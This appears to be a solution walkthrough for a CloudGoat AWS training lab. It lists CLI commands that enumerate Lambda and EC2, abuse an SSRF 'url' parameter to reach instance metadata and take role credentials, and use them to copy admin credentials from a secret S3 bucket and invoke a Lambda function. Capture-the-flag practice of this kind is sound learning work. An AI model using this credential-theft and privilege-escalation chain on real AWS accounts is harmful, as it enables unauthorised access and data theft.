aws configure --profile solus
aws lambda list-functions --profile solus
aws configure --profile cglambda
aws ec2 describe-instances --profile cglambda
Go to http://<EC2 instance IP>
Abuse the SSRF via the "url" parameter to hit the EC2 instance metadata by going to:
http://<EC2 instance IP>/?url=
And then:
http://<EC2 instance IP>/?url=<the role name>
Then Add the EC2 instance credentials to your AWS CLI credentials file at ~/.aws/credentials
) as shown below:
aws_access_key_id = asdasdasd
aws_secret_access_key = asdasdsadas
aws_session_token = "asdasdasd"
aws s3 ls --profile cgec2role
aws s3 ls --profile cgec2role s3://cg-secret-s3-bucket-<cloudgoat_id>
aws s3 cp --profile cgec2role s3://cg-secret-s3-bucket-<cloudgoat_id>/admin-user.txt ./
cat admin-user.txt
aws configure --profile cgadmin
aws lambda list-functions --profile cgadmin
aws lambda invoke --function-name cg-lambda-<cloudgoat_id> ./out.txt
cat out.txt